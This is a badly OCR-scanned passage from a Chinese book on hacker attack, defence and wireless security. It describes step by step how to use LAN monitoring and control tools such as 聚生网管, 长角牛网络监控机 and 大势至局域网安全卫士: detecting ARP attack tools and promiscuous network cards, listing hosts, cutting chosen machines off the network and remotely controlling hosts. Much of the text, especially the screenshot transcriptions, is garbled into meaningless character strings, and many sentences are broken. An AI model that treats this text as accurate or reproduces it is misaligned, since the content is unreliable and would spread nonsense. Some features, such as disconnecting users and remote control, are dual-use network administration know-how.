圆 pzskToF--。 19216580107 38 54fE.5B:10 DESKTOP-D5KFI 

回 -- 1921680109 T0472CD31124 A 

辆 Piep 技 1921630108 4045EFDEA9D3 

国 wroc7oz。 1921680114 codesarpasoe 。。 ArolGraznnzzl dipaacm 

1921080102 848E52381701 
国 - 19216a0105 E000coconesD 有 
1921680101 。。 A444DLD34879 

加- 1921680100 A4SE60167AAl es 

口 = 动听 主机 并 运行 者 定 

口 由 光 |p-MACHY9 . 发 类 第 河 皇 了 网 络 安全 ， 埋 趟 要 随 林 修改 |P， 你 的 昧 1 为 %r5 ,请 两 闪 收 下 为 革 
口 Nengip-MACHrS3t . 朵 末 过 十 员 公司 :入 

一 sme | 

step 本 为 了 保证 无 线 局 域 网 的 安全 ， 防 止 


无 线 局 域 网 内 其 他 用 户 用 聚 生 网 管 扰 乱 无 
线 局 域 网 ， 该 工具 还 提供 了 防护 “网 内 其 
他 运行 记录 ”功能 ， 单 击 “ 安 全 防御 ” 按 
钮 ， 在 弹出 的 下 拉 列 表 中 选择 “网 内 其 他 
运行 记录 ”选项 ， 打 开 “ 局 域 网 本 软件 运 
行 记 录 ” 对 话 框 ， 聚 生 网 管 的 正式 版 可 以 
强制 测试 版 、 试 用 版 的 聚 生 网 管 退 出 ， 并 
且 记 录 下 运行 聚 生 网 管 的 主机 的 机 器 名 、 
运行 时 间 、 网 卡 、IP， 以 及 系统 对 其 处 理 结 
果 等 信息 ， 如 下 图 所 示 。 


| 国 已 域 网 本 软件 运行 记录 江 
局 城 网 内 其 他 主机 运行 本 软件 发 现 记录 回 强制 试用 版 退出 
时 间 1p 地址 3 网 卡 地 址 处 理 结果 
党 2 


step 图 利用 聚 生 网 管 可 以 检测 当前 对 无 线 局 
域 网 危害 最 为 严重 的 三 大 工具 : 无 线 局 域 
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SS 黑客 攻防 与 无 线 安全 从 新 手 到 高 手 ( 超 值 版 ) 


终结 者 、 网 络 剪 刀 手 和 网 络 执法 官 。 在 
er 主 窗口 中 单 击 “ 安 全 防御 ” 
按钮 ， 在 弹出 的 下 拉 列 表 中 选择 “安全 监 
测 工具 ?” 选项， 打开 “安全 监测 工具 ”对 
话 框 ， 在 其 中 即 可 看 到 局 域 网 攻击 检测 工 
具 和 局 域 网 ARP 病 毒 、ARP 攻 击 专项 检测 工 
具 等 ， 如 下 图 所 示 。 


安全 监测 工具 x 
一 局域网 混杂 模式 记 襄 性 测 上 
本 工具 可 以 检测 局域网 内 网 卡 处 于 混杂 模式 的 节点 ， 以 发 现 呈 次 件 或 其 他 网 管 类 软件 
bi 
二 . 局 吉 网 攻 二 检测 工具 
系统 可 以 检测 当前 局 域 网 三 大 工具 软件 : 局 域 网 终结 者、 网 络 芝 刀 手 、 网 络 执法 官 
bi 
三 .局 吉 网 ARP 陋 吾 、ARP 攻 去 专项 检测 工具 Wu 
Daman 
ARP 攻 击 历史 记录 : 
时 间 1P 地 址 二 Ms 网 卡 地 址 1 
< | 
pm 


[seep 医 单 去 “局 域 网 攻击 检测 工具 ”栏目 中 

的 “开始 检测 ”按钮 ， 即 可 打开 “局 域 网 

攻击 软件 检测 工具 ”对 话 框 ， 如 下 图 所 示 。 

二 RE 
开始 检测 


王 地 址 检测 结果 


单 击 “ 开 始 检测 ”按钮 ， 即 可 打开 是 
否 使 控制 服务 处 于 停止 状态 提示 框 ， 如 下 图 
所 示 。 


重要 提示 


© 在 进行 攻 二 工具 检测 时 桂 生 网 管控 制服 务必 须 辕 时 停止 ， 
请 浆 首 先 停止 一 下 控制 服务 ,等 检测 完毕 再 重新 宏 动 ! 


请 问 控制 服务 现在 是 处 于 停止 状态 吗 了 
击 


step 了 加 单 去 “是 ”按钮 ， 即 可 检测 整个 无 线 局 
域 网 中 是 否 存在 无 线 局 域 网 攻击 ， 同 时 将 检测 
的 结果 显示 在 下 面 的 列表 中 ， 如 下 图 所 示 。 
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I 


et 


[二 
人 


[step 了 图 单 击 “ 聚 生 网 管 ”窗口 中 的 “扩展 插 
件 ” 按 钮 打开“ 扩展 插件 ”对 话 框 ， 在 
其 中 即 可 看 到 聚 生 网 管 自 带 的 扩展 工具 ， 
如 下 图 所 示 。 


[7 x 


后 相生 网 管 站 不 记 及 三 功 沪 抽 闫 ( 久 全 能 屋 吕 的 


村 生 网 管 外 来电 统 近 各 苛 县 大 基于 ( 砂 和 ] 次 件 工 各 有 限 公司 准 测 的 一 让 专门 甩 于 乱 东 外 宁 电 


后 到 归 生 网 管 主 机 失 革 守 报 工具 ( 仅 全 表 析 氨 ) 


pe t 床 网 件 工程 有 限 公司 准 出 的 一 吉村 允 
TT CR 


可 者 和 局 加 网 


届 避 吉 生 潮 和 网卡 江 录 模式 检测 工具 ( 仅 全 机 标 浊 6t) 

要 全 式 夫 贡 工具 对 大 务 至 (北京 软件 工程 有 职 公 司 开发 准 一 蒜 志 门 检 册 用 域 
Pm UL se ri 
忱 软 叶 、 沪 止 安 关 wireshark 浊 过 软 从 等 “从 而 更 好 地 保 沪 内 网 的 网 小 雪 全 和 商业 机 灾 ， 


Et 
3 术 [Remote Management Technolcgy , 阐 际 RMIT ) 旺 一 区 山城 
内 的 系 开 向 理 工具， 齐 台 RMT .只 爱 要 而 网 入 任 生 一 各 红 丘 范 吕 ,不 委 基 在 可 户 淘 知 


在 “ 聚 生 网 管 ” 主 窗口 中 ， 单 去 “全 局 
设置 ”按钮 ， 即 可 打开 “运行 设置 ”对 话 框 ， 
在 “系统 设置 ”选项 下 可 以 对 软件 启动 、 托 
盘 图 标 、 呼 出 热 键 、 密 码 保护 、 软 件 CPU 占用 
设置 等 属性 进行 相应 的 设置 ， 如 下 图 所 示 。 
国运 和 本 x 
人 
葡 件 启动 习 置 
ei 
= 口 ge bt 要 有 

口 举 意外 中 和 j 动 重新 加 吉 - 重启 软件 生效 

ee [B。 同 4 对 重启 软件 生 灼 

ee 

回 记录 日 志 到 [SQtite “| 数据 应 ,并且 尖 志 达到 |500 | M 打 三 动 和 从 开创 奸 和 98 区 库 。 


-本 上 如 ALT + 站 
回放 S 示 [23 可 


读 在 记 册 下 过 下 执 恕 ”| 无 


口 各 订 关 亲 对 主 砚 慰 护 。( 注 : 到 认 且 世 执 怠 ;ALT+F1 ) 


[i 天 给 和 过硬 : | ] 
容 从 运行 PU 占用 2 主 。| 开 天 PCPU 二 用 和 司 (Bas4x) 
Gc 


Estee 图 选择 “优先 级 设置 ”选项 卡 ， 在 其 
中 即 可 对 软件 进行 优先 级 设置 ， 设 置 完毕 
后 ， 单 击 “ 保 存 设置 ”按钮 即 可 ， 如 下 图 
所 示 。 


[ES 四 
和 设置 优生 


软件 优先 级 设 于 


回 启用 网 冶 应 用 优先 公设 置 (QOS) 
口 引用 全 局 白 名 所 设 千 。 门 局 用 全 局 寺 名 皇 设 半 
] 活 吉 
期 除 
3 
SS 
导入 


QQ 可 加 


14.4.2 ”长 角 牛 网 络 监控 机 


长 角 牛 网 络 监控 机 《网 络 执法 官 ) 只 

一 台 机 器 上 运行 ， 可 穿 透 防火 墙 ， 实 
时 监控 、 记 录 整 个 无 线 局 域 网 用 户 上 线 情 
况 ， 可 限制 各 用 户 上 线 时 所 用 的 IP、 时 段 ， 
并 可 将 非法 用 户 踢 下 无 线 局 域 网 。 本 软件 
适用 范围 为 无 线 局 域 网 内 部 ， 不 能 对 网 关 
或 路 由 器 外 的 机 器 进行 监视 或 管理 ， 适 合 
无 线 局 域 网 管理 员 使 用 。 


1. 查看 主机 信息 


利用 该 工具 可 以 查看 无 线 局 域 网 中 
各 个 主机 的 信息 ， 例 如 用 户 属 性 、 在 线 记 
录 、 记 录 查 询 等 ， 其 具体 操作 步骤 如 下 : 
step 加 在 下 载 并 安装 “长 角 牛 网 络 监控 
机 ”软件 之 后 ， 选 择 “ 开 始 ” 一 “所 有 应 
用 ”一 Netrobocop 菜 单项 ， 即 可 打开 “设置 
监控 范围 ”对 话 框 ， 如 下 图 所 示 。 
[step 图 在 设置 完 网 卡 、 子 网 、 扫 描 范 围 等 属 
性 之 后 ， 单 击 “ 添 加 /修改 ”按钮 ， 即 可 将 
设置 的 扫描 范围 添加 到 “监控 如 下 子 网 及 IP 
段 ” 列表 中 ， 如 下 图 所 示 。 
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335 国 7 EE [ 卫 本 255 ”| 深 加 候 改 | 
央 竹 如 下子 网 & 员 次 除 
| | 了 把 指名 国 G 堵 】 


+ 并 确定 退出 


/100 00D TC 
se loyinVIDnnyase-T 
现 re 158.0, 1 ~ 192. 168.0.254]™ 
5 国 : FIEOT -97 -0254 ”| 深 加 久 下 
其 i 如 下 子 同 有 各 欧 辽 
[地址 T 3B 


手工 扣 作 ， 取 消 自动 运行 > 


.| 确定 


[step 图 选中 刚 添加 的 IP 段 后 ， 单 击 “ 确 定 ” 
按钮 ， 即 可 打开 “长 角 牛 网 络 监控 机 ” 主 
窗口 ， 在 其 中 即 可 看 到 设置 IP 地 址 段 内 的 主 
机 的 各 种 信息 ， 例 如 网 卡 权 限 地 址 、IP 地 
址 、 上 线 时 间 等 ， 如 下 图 所 示 。 


Step 加 在 “长 角 牛 网 络 监 控 机 ”窗口 的 计算 


机 列表 中 双击 需要 查看 的 对 象 ， 即 可 打开 
“用 户 属性 ”对 话 框 ， 如 下 图 所 示 。 


加 F< 录 | 国 ER || DISR 户 关闭 | 
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step 图 单 去 “历史 记录 ”按钮 ， 即 可 打开 
“在 线 记 录 ” 对 话 框 ， 在 其 中 查看 该 计算 
机 上 线 情况 ， 如 下 图 所 示 。 

几 户 ,000050 [下 二 家 辣 下 主 产 | 革 下 证 ] 


和 EF 宗主 
HE PE 
(DENCTEC 


al /apOEe-611211054 


吕 洁 克明 于 于 3 
Eee 图 单 去 “导出 ”按钮 ， 即 可 将 该 计算 机 
的 上 线 记录 保存 为 文本 文件 ， 如 下 图 所 示 。 


司 Tem5E93 - 记事 本 (=, x 
文 位， 总 (6 椎 式 O) 查看 (V) Noy 

长 角 网 络 玫 机 用 户 上 线 记录 ， 台 2017-08-15 09:39:52 。 
攻守 和 ‘96: i A 家 不 详 


i 


斌 ， 是 否 合法 , ITP, 组 /主机 /用 户 , 上线 时 间 , 下 线 时 间 , 下 线 原因 
也是 , 192. 165.0, 112, YOREGROUP / AT0IG-611211054 / AFOIG-6112 


Rr en Eb en TY 


step 图 在 “长 角 千 网 络 监 控 机 ” 窗 口中 单 击 


[step 国 在 “长 角 牛 网 络 监控 机 ”窗口 中 单 
击 “ 记 录 查 询 ” 按 钮 ， 即 可 打开 “记录 查 
询 ” 窗 口 ， 如 下 图 所 示 。 

Tri LYE VI L = 
元 四 在 “用 户 ” pe 


户 对 应 的 网 卡 地 址 ; 在 “在 线 时 间 ” 文 本 框 中 
设置 该 用 户 的 在 线 时 间 ， 然 后 单 击 “查找 ” 
按钮 ， 即 可 找到 该 主机 在 指定 时 间 的 记录 ， 
如 下 图 所 示 。 
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“本 机 状态 ”选项 ， 即 可 打开 “本 机 状态 
信息 ”窗口 。 在 其 中 即 可 看 到 本 计算 机 的 
网 卡 参数 、IP 收 发 、TCP 收 发 、UDP 收 发 等 
eta leah 


ET 
Fem 


Tu 


lenere st6 ne0 or 人 


人 有 直人 和 机" 中 

击 “ 服 务 监测 ”选项 ， 即 可 打开 “服务 监 
测 ” 窗 口 ， 在 其 中 即 可 进行 服务 器 的 添 
加 、 修 改 、 删 除 等 操作 ， 如 下 图 所 示 。 


人 ANA 
[区 


sat 
C2 
EE 
es 


Sa 


ER 


2. 设置 无 线 局 域 网 


除 收集 无 线 局 域 网 内 各 个 计算 机 的 信 
息 之 外 ，“ 长 角 牛 网 络 监控 机 ”工具 还 可 
以 对 无 线 局 域 网 中 的 各 个 计算 机 进行 网 络 
管理 ， 可 以 在 无 线 局 域 网 内 的 任 一 台 计算 
机 上 安装 该 软件 ， 来 实现 对 整个 无 线 局 域 
网 内 的 计算 机 进行 管理 。 

其 具体 的 操作 步骤 如 下 : 

Estee 加 在 “长 角 牛 网 络 监控 机 ”窗口 中 选择 
“设置 ”一 “关键 主机 组 ”命令 项 ， 即 可 
打开 “关键 主机 组 设置 ”对 话 框 ， 在 “ 选 
择 关键 主机 组 ”下 拉 框 中 选择 相应 的 主机 
组 ， 并 在 “组 名 称 ” 文 本 框 中 输入 相应 的 名 
称 之 后 ， 再 在 “组 内 IP” 列 表 框 中 输入 相应 
的 IP 组 。 最 后 单 击 “ 全 部 保存 ”按钮 ， 即 可 
完成 关键 主机 组 的 设置 操作 ， 如 下 图 所 示 。 


关键 主机 组 设置 x 
选择 关键 主机 组 : [EE 于 村: 开 
组 名 称 : [roup 村 
组 内 IP: 
1. .0.0.0 2. Jo.0.0.0 3. Jo.o.0.0 
4. Jo.0.0.0 5. |o.o.0.0 6. |o.0.0.0 
7. jo.0.0.0 8. |b.o.0.0 9. |b.o.0.0 
10. |-o-0.0 11. [0o.0.0 12. |.0.0.0 
13, [0.0.0.0 14. [0.0.0.0 15. 0.0.0.0 
16. 后.0.0.0 17. J-o.0.0 18. [0.0.0.0 
全 部 保存 取消 
侈 提示 : “关键 主机 组 ”是 由 管理 员 指 定 


的 JP 地 址 ， 可 以 是 网 关 、 其 他 计算 机 或 服务 
器 等 。 管 理 员 将 指定 的 IP 存 入 “关键 主机 
组 ”之 后 ， 即 可 令 非 法 用 户 仅 断 开 与 “ 关 
键 主机 组 ”的 连接 而 不 断 开 与 其 他 计算 机 
[See 图 在 “长 角 牛 网 络 监 控 机 ”窗口 中 选择 
“设置 ” 一 “默认 权限 ”菜单 项 ， 即 可 打 
开 “ 用 户 权限 设置 ”对 话 框 ， 选 择 “ 受 限 
用 户 ， 若 违反 以 下 权限 将 被 管理 ” 单 选 按 
钮 之 后 ， 设 置 “IP 限 制 ”“ 时 间 限 制 ” 和 
“组 /主机 /用 户 名 限制 ”等 。 这 样 当 目 标 计 
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算 机 与 无 线 局 域 网 连接 时 ，“ 长 角 牛 网 络 
监控 机 ”将 按照 设 定 的 选项 对 该 计算 机 进 
行 管 理 ， 如 下 图 所 示 。 


月 广 STR 设 醒 x 


设置 新 月 户 默 认 权限。 
设备 权限 
人 自由 用 户 ， 与 网 络 连 接 不 受 限 钙 。 
个 权限 用 户 ， 若 启 反 以 下 权限 将 补 管 理 。 


厂 超过 过 ] 天 直上 线 m 人 为 禁 目 用 户 
个 禁止 用 户 ， 发 现 该 用 户 上 线 即 管理 * 
对 违 页 以 上 术 限 的 用 户 ， 桂 自动 技 以 下 方式 进行 管理 。 


[a EE | 
到 ] | 关键 主机 组 
[el 可 感 主机 

保存 ]| 取消 | 


嘎 制 | 哟 贴 || sh 由 GEm) | 


可 以 利用 “长 角 牛 网 络 监控 机 ”工具 
保护 指定 的 IP 地 址 段 。 在 “长 角 牛 网 络 监控 
机 ”窗口 中 选择 “设置 ”一 “IP 保 护 ”菜单 
项 ， 即 可 打开 “IP 保 护 ” 对 话 框 。 在 其 中 设 
置 要 保护 的 IP 段 后 ， 单 击 “ 添 加 ”按钮 ， 即 
可 将 该 IP 段 添加 到 “已 受 保护 的 IP 段 ”列表 
中 ， 如 下 图 所 示 。 

[7 


ra 


设置 受 保护 IP 


指定 IP 段 已 受 保护 的 IF 段 
从 Jieor [ol] 192. 168.0.1 ~ 192.168.0.254 
到 |192. 168.0.254 
添加 >> 
重 除 “< 


ni 


取消 


[Sep 加 在 “长 角 牛 网 络 监控 机 ”工具 中 还 
可 以 设置 敏感 主机 。 在 “长 角 牛 网 络 监 控 
机 ”窗口 中 选择 “设置 ”一 “敏感 主机 ” 
菜单 项 ， 即 可 打开 “设置 敏感 主机 ”对 话 
框 ， 在 “敏感 主机 MAC” 文 本 框 中 输入 目 
标 主机 的 MAC 地 址 后 单 击 _»》 | 按钮 ， 即 可 
将 该 主机 设置 为 敏感 主机 ， 如 下 图 所 示 。 
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SS 黑客 攻防 与 无 线 安全 从 新 手 到 高 手 ( 超 值 版 ) 


[Eee 图 在 “长 角 牛 网 络 监控 机 ”窗口 中 选择 
“设置 ”一 “远程 控制 ”菜单 项 ， 即 可 打 
开 “ 远 程控 制 ” 对 话 框 ， 在 其 中 选中 “ 接 
受 远程 命令 ” 复 选 框 ， 并 输入 目标 主机 的 IP 
地 址 和 口令 后 ， 即 可 对 该 主机 进行 远程 控 


制 ， 如 下 图 所 示 。 
远程 控制 x 

接受 远程 命令 并 作出 相应 的 控制 操作 。 
要 控 设置 

克 接受 远程 命令 

对 方 TP 192. 168.0. 10d 
对 方 庙 口 (TcP) 17868 默认 端口 
口令 


取消 测试 更 多》 
在 “长 角 牛 网 络 监 控 机 ”窗口 中 选择 
a 一 “主机 保护 ”菜单 项 ， 即 可 打 
开 “ 主 机 保护 ”对 话 框 ， 在 选中 “启用 主 
机 保护 ” 复 选 框 后 ， 输 入 要 保护 主机 的 卫 地 
扯 条 网 直 地 二 这 后 市“ 大 和 六 介 ， 


即 可 将 该 主机 添加 到 “ 受 保护 主机 ”列表 
中 ， 如 下 图 所 示 。 
| 主机 尿 沪 x 
万 启 四 主 员 保 护 人 这 5 二] 
i 要 保护 主机 
mm | | ee 
网 上 地 址 。。 [ma | 移 k( 
O22 
扩 
SE | 
| 厂 保护 全 了 (上 机 中 傅 用 ) 
NP 
。 震 助 ”| 厂 BT 方式 自动 封锁 AP 做 训 
ee WELL ETE 
厂 信 有 主刀 保 护 并 且 庆 4 不 再 显示 
一 


BE 在 “长 角 牛 网 络 监控 机 ”工具 中 还 
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可 以 添加 新 的 用 户 。 在 “长 角 牛 网 络 监控 
机 ”窗口 中 选择 “用 户 ” 一 “添加 用 户 ” 
菜单 项 ， 即 可 打开 New user 对 话 框 ， 在 
MAC 文 本 框 中 输入 新 用 户 的 MAC 地 址 后 ， 
单 击 “ 保 存 ” 按 钮 即 可 实现 添加 新 用 户 操 
作 ， 如 下 图 所 示 。 


WC: [00-10-24-56-69-DE 
注释 : 邦 工 加 入 ,2017-08-15 09:50。 


视 限 设 置 | 保存 | 取消 | 


[step 图 在 “长 角 牛 网 络 监控 机 ”窗口 中 选择 
a 一 “远程 添加 ”菜单 项 ， 即 可 打 

“远程 获取 用 户 ” 对 话 框 ， 在 其 中 输入 远 
eg 数据 库 名 称 、 登 录 名 称 以 
及 口令 之 后 ， 单 击 “ 连 接 数 据 库 ”按钮 ， 即 
可 从 该 远程 主机 中 读 取 用 户 ， 如 下 图 所 示 。 


GE x 
全 得 开 5 夫 扫 床 中 读 肌 内 户 ， 


Ek a 


[Ges 图 如 果 禁 止 无 线 局 域 网 内 某 一 台 计算 机 
的 网 络 访问 权限 ， 则 可 在 “长 角 牛 网 络 监 
控 机 ”窗口 内 右 击 该 计算 机 ， 在 弹出 的 快 
捷 菜 单 中 选择 “锁定 /解锁 ”选项 ， 即 可 打 
开 “ 锁 定 /解锁 ”对 话 框 ， 如 下 图 所 示 。 


[了 x 
网 卡 : 9-FB-7E-EA-FC-FA [网 卡 生产 厂家 不 详 ] 
注释 : 阿 卡 生产 厂家 不 详 
时 和 
请 不 要 对 诸如 路 由 咕 、 交 换 机 、 及 务 吕 等 网 结 关 键 设备 进行 钙 定 。 
锁定 方式 : 
个 不 镶 定 (背后) 
个 禁止 与 以 下 关键 主机 组 的 TCM 连接 
三 第 三 第 第 = 
厂 若 组 厂 第 组 厂 第 蛆 厂 第 中 加 
人 禁止 与 所 有 主机 89TCPAIF 连 接 ( 除 敏感 主机 外 ) 
确定 取消 


Eee 加 在 其 中 选择 目标 计算 机 与 其 他 计算 机 
(或 关键 主机 组 ) 的 连接 方式 之 后 ， 单 击 
“确定 ”按钮 ， 即 可 禁止 该 计算 机 访问 相 
应 的 连接 ， 如 下 图 所 示 。 


© Hm i = 

mmm aa RI mmol aa 

FETCEIORFTTEET 
和 


E23 


[step 了 加 在 “长 角 牛 网 络 监控 机 ”窗口 内 选中 
某 台 计算 机 信息 并 右 击 ， 在 弹出 的 快捷 菜单 
中 选择 “手工 管理 ”选项 ， 即 可 打开 “手工 
管理 ”对 话 框 ， 在 其 中 即 可 手动 设置 对 该 计 
算 机 的 管理 方式 ， 如 下 图 所 示 。 


J em ER se CE 


手工 管理 x 


长 :|S8-FB-7E-EA-FC-FA 


注释 : 阿 卡 生产 厂家 直译 
IP: |192, 168.0.105 
名 称 :F7- 7 
这 交换 机 起 ; S 
请 不 要 对 诸如 路 由 器 、 交 换 机 、 服 务 器 等 网 络 关键 设备 进行 管理 。 
管理 方式 
厂 ?冲突 
厂 禁止 与 关键 主机 组 进行 TCFMIP 和 连接 
FF | 号 关键 主机 组 
可 el BB 可 敏感 主机 
厂 禁止 与 所 有 主机 进行 TCF 连接 ( 除 敏感 主机 外 ) 
断 开 方式 | 逢 默 断 开 了 |] 厂 高 缴 阳 断 
管理 频率 : | 12 了 帮助 
管理 次 数 :0 
开始 | ] [结束 | 


[step 图 在 “长 角 牛 网 络 监控 机 ”工具 中 还 可 
以 给 指定 的 主机 发 送 消息 。 在 “长 角 牛 网 
络 监 控 机 ”窗口 中 选中 某 台 计算 机 信息 并 
单 击 和 鼠标 右键 ， 在 弹出 的 快捷 菜单 中 选择 
“发 送 消息 ”选项 ， 即 可 打开 Send message 
对 话 框 ， 在 其 中 输入 要 发 送 的 消息 后 ， 单 
击 “ 发 送 ” 按 钮 ， 即 可 给 该 主机 发 送 指定 
的 消息 ， 如 下 图 所 示 。 
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Send message x 
清和 并 且 被 正确 取出 名 称 的 用 户 ， 才 能 接收 到 此 


发 送 至 : 后 6- 可 -E79-73 [网 下 生产 厂家 不 泽 ] 
了 TO 
:GO 7 同 卫 科技 7 网吧 村 


发 送 者 ; [长 页 牛 同 缚 监控 机 
接站 者 同乡 科技 

发 送 次 数 : -二 。 公主 册 版 能 设置 发 送 者 名 称 及 发 送 次 数 。 
正文 : | 你 好 


发 送 结束 


14.4.3 ”大 势 至 局 域 网 安全 卫士 


大 势 至 局 域 网 安全 卫士 是 一 款 专业 的 
局 域 网 安全 防护 系统 ， 它 能 够 有 效 地 防止 
外 来 计算 机 接 入 公司 无 线 局 域 网 ， 有 效 隔 
离 无 线 局 域 网 计算 机 ， 并 且 还 有 禁止 计算 
机 修改 IP 和 MAC 地 址 、 检 测 局 域 网 混杂 模 
式 网 卡 、 防 御 局 域 网 ARP 攻 击 等 功能 。 

使 用 大 势 至 局 域 网 安全 卫士 防护 系统 
安全 的 操作 步骤 如 下 。 

下 载 并 安装 大 势 至 局 域 网 安全 卫士 ， 
即 可 打开 “大 势 至 局 域 网 安全 卫士 ”工作 
界面 ， 如 下 图 所 示 。 


调 x 到 避风 二 二 VS 1 - 吉 R 司 - oO x 
天 地 次 件 关于 我 们 。 访 本 中 网。 关 天 过 杠 。 卫 和 4]。 村 加 。 过 必 科 茹 
请 运 帮 PEVeHE atar Atheros MeUIGL BEE Rianat Entrd ~ | 逢 内 近 
台 名 单 (好 公司 内 部 电脑 ) 操作 
El 式 地 址 主 负 名 塌 加 
Ey 
又 
D3 
3 
移 到 时 名单 
自 让 天 再 让 | 电脑/ 于 从 /二 板 | 检 出 自卫 认同 dp 天 线 共 由 器 | 栓 列 
问 白地 址 站 更 Hj 自 动 高 回 自 名 ec 村 更 对 自动 卫 训 
回 发 Ar 二 时 和 入 要 信 息 加 发现 局 二 Fjur 牙 击 时 自 夫 高 
加 要 局 3 必 昌 。 | 探 划 | 思 检 出 到 提亲 午时 报 移交 列 | 扣 作 
票 名单 ( 风 公司 外 吉 电 入) 
EE TT EEC WE 
隔 高 太 式 
目 动 珊 敲 
回 手 二 高 
强 外 高 
隔 高 过 而 
回 各 上 询 a 同 
回 禁 止 访 双 网 
网 线 击 全 于 和 查 和 而 史记 录 ”于 空 输出 记录 
En py 于 隔 亲 力度 
口 强 回 中 口 弹 


stsp 图 单 去 “开始 监控 ”按钮 ， 即 可 开始 
监控 当前 无 线 局 域 网 中 的 计算 机 信息 ， 对 
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SS 黑客 攻防 与 无 线 安全 从 新 手 到 高 手 ( 超 值 版 ) 


于 无 线 局 域 网 外 的 计算 机 将 显示 在 “ 黑 名 
单 ” 窗 格 之 中 ， 如 下 图 所 示 。 


园 关 芝 到 局 城 网 安全 十 V3.1 - 试 所 后 三 ” 百 ”- 滨 
TK TR EN EA 县 乱 人 二 区。 过 全 权 
i eo laptse Athecas MLDO! Geabit Btbernet Ceatrdler 一 
自 名 单 [ 即 公司 内 部 电 胶 ) 操作 
ET 二 ES 9 
SN 
到 
RR 
和 
本 
后 下 且 /下 下 | 入 | 避 白 二 9 吕 | 科 到 
回 和 和 单 地 直 下 二 病 区 自杀 和 mrtg 让 更 时 自贡 
回 更 A 下 机 二 要 村 写 。。。 问 改 现 必 Np 东 二 时 和 有 
加 nt 天 | 中 检 了 情 亲 术 同 Hi 区 【入 到 | 抽 作 
时 名单 ( 阳 公 司 站 部 电脑 ) 
二 EL RD) 和 
L 局 !s 同 高 方式 
口 | everrowens lle temo in 500 Ba 有 
日] 本 aaa ise tm ot2 mm 
区 圆 。 mneaet0ppa 旺 198 1.0.105 300 3 用 
HR 
ER | 
EDR 
neha 二 时 元 时 
| TH EE Ld 
口 强加 中 口 肌 


如 果 确 定 某 台 计算 机 是 无 线 局 域 网 内 的 
计算 机 ， 则 可 以 在 “ 黑 名单 ” 窗 格 中 选中 该 计 
算 机 信息 ， 然 后 单 击 “ 移 至 白 名单 ” 按 钮 ， 将 
其 移动 到 “ 白 名 单 ” 窗 格 之 中 ， 如 下 图 所 示 。 


| 国 大 各 到 网 安全 二 十 V3.1 - 过 后 - 0 Xx 


FR FR A A 陈 和 类 们 部 和 秋生 有 

rienbit Perwet Fantrille “| | 人 上 

提单 公 司 夫 吉 困 ) 人 f 

[ELT 3 EE 0 

本 lm i = 

:| 加 Hse lea n lng A 
E23 
MW 
有 
人 


自 证 后 训 1 丰 电 及 / 手 人 下 板 | 术 出 器 下 肌 可 局 id 由 器 村 到 
回 生 攻 单 z 地 直 突 更 时 外 动情 记 区 丘 吉 弟 mc 地 址 安 更 寺 自 :二 


辐 发 现 A 丰 击 时 同根 信 息 [DR 
回 术 lH 本 高 员 地 从 理 。 “看 | 回 术 加 人 十 芭 同 卡 时 扫 可 入 划 | 得 作 
时 名 单 (公司 外 名 也 及 ) 
I Em RE 
口 | 四 poroowrocato fise tem.0.107 on IE 
回 日 sp 
三 Sa 
口 | 夯 ，jwtntmem be tm.0 100 [300 5 
sed 
ET 
Ei 
网 安全 事件 坦 站 中 记录 直入 纪录 
站 “天 证 T HE ] 
ODO 强国 由 口 组 


Estee 加 单 去 “自动 隔离 局 域 网 无 线路 由 器 ” 
右 侧 的 “检测 ”按钮 ， 可 以 检测 当前 无 线 
局 域 网 中 存在 的 无 线路 由 器 设备 信息 ， 并 
在 “网 络 安全 事件 ” 窗 格 中 显示 检测 结 
果 ， 如 下 图 所 示 。 
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EE - OO x 
FT 7 A 区 寺 党 层 。 和 生 人 。 大 取 。 这 入 多 


A etverk slapter "Arheros Maict dieait Ethernet Dontrdller v| | 有 ME 
后 名 单 (从 本 内 各 和 及) Ea 
ELE E73 EL 拟 加 
中 到 tomeny se 100 0. 100 
ES — 
E39 
机 除 
EE 
和 于 
自 细 让 电驴 手术 /于 板 | 准则 | 加 自动 隔 雪 局 可 3 天线 中 由 器 
加 白地 EH 白 江 5 回 提名 eur 相交 更 时 自 吉 有 
回 六 局 本 4 到 下 击 H3 目 i 了 有 
NH。 | 报到 | 思 术 et 多 放 FHFEj8 等 6 | 提 
于 名单 (全 公司 外 部 电脑) 
天 3 CEEERD EE 
且 力 碟 
目 : 加 高 
癌 和 | 隔 寅 
强人 
也 计 了 
回 策 Hpa 风 网 
回 各 LW 网 
安全 事件 要 看 而 史记 好” 理 和 出 记录 
E77 TE EE mp 
CTI 口 强加 中 口 六 
aocoec- .10.106.0 112 的 ec6-60-00ACAC- 


单 击 “ 查 看 历史 记录 ”按钮 ， 即 可 打 
开 “IPMAC- 记 事 本 ”窗口 ， 在 其 中 查看 检 
测 结果 ， 如 下 图 所 示 。 


网 ,PMAC - 记事 本 as， | 说 
次 林 四 多 可 格 RXO) 可 浊音 


8C-AD-13-5F, IP:192. 168. 0. 104 可 为 无 线 中 国 
00-9C-CC-D1, IP:192. 168. 0. 112 可 Ed 
38-17-0}, Pp:199. 168 0, 103] 式 网 卡 
2 


-AD-13-5F, IP:192. 168. 0. 1040 
900-0- 3 IP:192. 168. 0. 1125]A 


大 势 至 局 域 网 安全 卫士 常用 功能 介绍 
如 下 。 

CL 
平板 ” 复 选 框 : 禁止 外 部 计算 机 (如 笔记 
本 ) 或 移动 设备 (如 平板 计算 机 或 手机 》 
接 入 单位 无 线 局 域 网 访问 因特网 。 


“自动 隔离 外 来 计算 机 /手机 / 


(2) “自动 隔离 无 线 局 域 网 无 线路 由 
器 ” 复 选 框 : 当 检 测 到 无 线 局 域 网 中 存在 
无 线路 由 器 时 ， 自 动 将 其 隔离 。 

(3) “ 白 名 单 IP 地 址 变更 时 自动 隔 
离 ” 复 选 框 : 禁止 单位 内 部 计算 机 修改 耳 地 
址 ， 防 止 耻 地址 盗用 ， 防 止 卫 冲突 攻击 ， 防 
止 越权 上 网 或 逃避 网 络 监 控 。 


(4) “ 白 名 单 MAC 地 址 变更 时 自动 
隔离 ” 复 选 框 : 禁止 单位 内 部 计算 机 修改 
MAC 地 址 。 

(5) “发 现 ARP 攻 击 时 输出 报警 信 
息 ” 复 选 框 : 当 发 现 ARP 攻 击 时 ， 输 出 报警 
信息 。 

(6) “发 现 无 线 局 域 网 ARP 攻 击 时 自 
动 隔离 ” 复 选 框 ， 当 检测 到 无 线 局 域 网 中 
存在 ARP 攻 击 时 ， 自 动 将 发 出 ARP 攻 击 的 
计算 机 隔离 。 

(7) “检测 并 隔离 无 线 局 域 网 代理 ” 
复 选 框 : 检测 无 线 局 域 网 中 是 否 存在 代理 
